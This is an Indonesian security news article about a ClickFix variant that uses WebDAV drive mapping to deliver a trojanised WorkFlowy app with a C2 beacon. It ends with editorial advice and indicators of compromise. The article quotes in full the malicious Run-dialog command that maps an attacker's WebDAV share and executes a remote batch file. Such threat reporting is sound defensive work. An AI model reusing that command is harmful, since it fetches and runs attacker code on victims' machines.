Varian Baru ClickFix: Modus Trojan WorkFlowy dengan WebDAV sebagai Sarana Serangan

Varian baru dari teknik ClickFix kini ditemukan dengan metode yang semakin canggih, memanfaatkan pemetaan drive WebDAV untuk menjalankan aplikasi WorkFlowy yang telah dimodifikasi secara berbahaya. Teknik ini memungkinkan penyerang untuk melakukan komunikasi C2 secara tersembunyi sekaligus mengirimkan payload malware ke perangkat korban.

Gambaran Umum Serangan Varian ClickFix Baru

Menurut laporan dari Tim Peneliti Keamanan Atos, varian terbaru ClickFix ini menggunakan trik sosial dengan mengelabui pengguna agar mengeksekusi perintah berbahaya melalui shortcut Win + R. Berbeda dengan varian sebelumnya yang banyak memanfaatkan PowerShell atau mshta, kali ini perintah “net use” digunakan untuk memetakan drive jaringan dari server luar yang meng-host file berbahaya. File batch “update.cmd” kemudian dijalankan dari drive tersebut untuk mengunduh dan mengekstrak arsip ZIP yang berisi aplikasi WorkFlowy versi lama yang telah disisipi kode berbahaya.

Teknik ini tergolong unik karena memanfaatkan mekanisme native Windows untuk memetakan WebDAV share sebagai drive lokal, menjalankan skrip batch, lalu menghapus pemetaan tersebut secara cepat. Ini memungkinkan pelaku untuk mengelabui sistem pertahanan dan meminimalkan jejak aktivitas berbahaya yang terdeteksi.

Fase Serangan dan Modus Operandi

• Korban diarahkan ke situs phishing yang menyamar sebagai halaman captcha, misalnya happyglamper[.]ro.
• Pengguna diminta membuka dialog Run (Win+R), lalu menempelkan perintah jahat dan menekan Enter.
• Perintah utama yang dijalankan adalah:
  cmd.exe /c net use Z: https://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete
• File batch update.cmd kemudian mengunduh arsip ZIP berisi aplikasi WorkFlowy trojan ke direktori lokal.
• Aplikasi WorkFlowy versi 1.4.1050 yang telah dimodifikasi dijalankan, dengan kode berbahaya tersembunyi dalam file app.asar sebagai main.js, yang berfungsi sebagai beacon C2 sekaligus dropper malware akhir.

Analisis Aplikasi WorkFlowy Trojan

Aplikasi WorkFlowy adalah aplikasi desktop berbasis Electron yang menggunakan teknologi web (HTML, CSS, JavaScript) dan mengemas kode sumbernya dalam file .asar. Dalam varian ini, kode asli main.js diganti dengan skrip obfuscated yang berjalan terlebih dahulu, memblokir fungsi asli aplikasi dan menjalankan kode jahat dengan hak akses penuh pengguna.

Beberapa fungsi utama malware meliputi:

1. Membuka loop beacon C2 yang mengirimkan data identifikasi korban (ID unik, nama mesin, username Windows) setiap 2 detik ke server pelaku.
2. Menghasilkan dan menyimpan victim ID di %APPDATA%\id.txt untuk pelacakan persistensi korban.
3. Menerima perintah dari C2 untuk mengunduh dan menjalankan payload tambahan secara remote.

Karena berjalan dalam proses utama Node.js di luar sandbox Chromium, malware memiliki kebebasan eksekusi penuh dan sulit dideteksi oleh antivirus maupun solusi EDR tradisional.

Keunggulan dan Implikasi Teknik Ini

• Pemanfaatan WebDAV sebagai media distribusi adalah inovasi baru dalam keluarga ClickFix, berbeda dari metode download langsung dengan PowerShell atau mshta.
• Penggunaan aplikasi legitimate yang dimodifikasi (WorkFlowy) membantu malware menghindari deteksi berbasis file dan perilaku.
• Hanya sedikit artefak yang tertinggal di sistem, sehingga sulit dideteksi oleh mekanisme keamanan konvensional.
• Deteksi varian ini hanya berhasil dilakukan melalui threat hunting proaktif yang mengamati pola eksekusi perintah dari dialog Run dan analisis perilaku.

Analisis Redaksi

Menurut pandangan redaksi, varian terbaru ClickFix ini menunjukkan evolusi teknik serangan yang semakin canggih dan sulit dilacak, mengandalkan living-off-the-land utilities Windows yang sah seperti net use untuk mengelabui sistem keamanan. Dengan memanfaatkan aplikasi yang sudah dikenal dan dipercaya pengguna, pelaku berupaya mengaburkan jejak serangan dan menghindari deteksi otomatis. Ini menggarisbawahi pentingnya pendekatan threat hunting berbasis perilaku dan konteks yang lebih mendalam daripada sekadar mengandalkan signature malware.

Ke depan, organisasi dan pengguna harus meningkatkan kesadaran terhadap metode serangan yang memanfaatkan fitur native OS dan aplikasi sah, serta mempersiapkan solusi keamanan yang mampu mendeteksi pola-pola tidak biasa pada eksekusi perintah dan aktivitas jaringan. Edukasi pengguna mengenai phishing dan risiko menjalankan perintah yang tidak jelas juga tetap menjadi garis pertahanan awal yang penting.

Pantau terus perkembangan ancaman ini dan perkuat postur keamanan Anda dengan metode hunting dan analisis kontekstual untuk meminimalisir dampak serangan siber yang semakin canggih.

Indikator Kompromi (IOC)

• Domain: cloudflare.report, happyglamper.ro
• IP: 94.156.170.255, 144.31.165.173
• URL: https://cloudflare.report/forever/e/
• File korban: %APPDATA%\id.txt
• Path staging: %TEMP%\[timestamp]
• SHA256 app.asar: a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063

Untuk informasi lebih lanjut dan pembaruan terbaru terkait intelijen ancaman ini, kunjungi https://atos.net/en/lp/cybershield.